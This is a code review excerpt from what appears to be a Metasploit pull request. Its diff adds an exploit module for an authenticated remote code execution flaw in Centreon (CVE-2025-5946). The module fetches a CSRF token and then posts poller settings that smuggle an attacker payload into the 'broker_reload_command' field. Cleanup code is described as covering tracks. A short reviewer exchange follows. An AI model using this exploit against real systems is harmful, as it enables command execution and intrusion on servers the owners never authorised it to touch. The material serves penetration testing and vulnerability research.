modules/exploits/linux/http/centreon_auth_rce_cve_2025_5946.rb

```diff
@@ -0,0 +1,289 @@
+      'vars_get' => {
+        'p' => 60901,
+        'o' => 'c',
+        'server_id' => 1
+      }
+    })
+
+    unless res&.code == 200 && res.body.include?('centreon_token')
+      vprint_status('No centreon_token found!')
+      return false
+    end
+
+    html = res.get_html_document
+    centreon_token = html.css("input[name='centreon_token']")[0].attribute_nodes[2].text
+
+    # update poller "centreon broker engine reload" setting with payload
+    if centreon_token
+      vprint_status("centreon_token=#{centreon_token}")
+      res = send_request_cgi({
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'main.get.php'),
+        'keep_cookies' => true,
+        'vars_get' => {
+          'p' => 60901
+        },
+        'vars_post' => {
+          'name' => 'Central',
+          'ns_ip_address' => '127.0.0.1',
+          'localhost[localhost]' => 1,
+          'is_default[is_default]' => 1,
+          'gorgone_communication_type[gorgone_communication_type]' => 1,
+          'gorgone_port' => 5556,
+          'engine_start_command' => 'service centengine start',
+          'engine_stop_command' => 'service centengine stop',
+          'engine_restart_command' => 'service centengine restart',
+          'engine_reload_command' => 'service centengine reload',
+          'nagios_bin' => '/usr/sbin/centengine',
+          'nagiostats_bin' => '/usr/sbin/centenginestats',
+          'nagios_perfdata' => '/var/log/centreon-engine/service-perfdata',
+          'broker_reload_command' => "service cbd reload#{payload}",
+          'centreonbroker_cfg_path' => '/etc/centreon-broker',
+          'centreonbroker_module_path' => '/usr/share/centreon/lib/centreon-broker',
+          'centreonbroker_logs_path' => nil,
+          'centreonconnector_path' => '/usr/lib64/centreon-connector',
+          'init_script_centreontrapd' => 'centreontrapd',
+          'snmp_trapd_path_conf' => '/etc/snmp/centreon_traps/',
+          'ns_activate[ns_activate]' => 1,
+          'submitC' => 'Save',
+          'id' => 1,
+          'o' => 'c',
+          'centreon_token' => centreon_token.to_s
+        }
+      })
+      if res&.code == 200 && res.body.include?('ajaxOption table')
+        vprint_good('Poller setting "broker_reload_command" updated with payload.')
+        return true
+      else
+        vprint_warning('Poller setting "broker_reload_command" is not updated with payload.')
+        return false
+      end
+    else
+      vprint_warning('Unable to process the centreon_token.')
+      return false
+    end
+  end
+
+  # try to remove the payload from the poller settings to cover our tracks
+  def cleanup
+    super
+    # check if payload should be cleaned
+    if @clean_payload
+      vprint_status('Cleaning up the mess...')
+      if drop_rce_payload(nil)
+        print_good('Payload has been successfully removed.')
+      else
+        print_warning('Payload not removed. Try to remove it manually.')
```

Comment:
It would be nice to give the user some info on how to perform the manual cleanup.

Reply:
Done. See https://github.com/rapid7/metasploit-framework/pull/20672/commits/85b4233345f60e282ae2320452e9f3134c929472.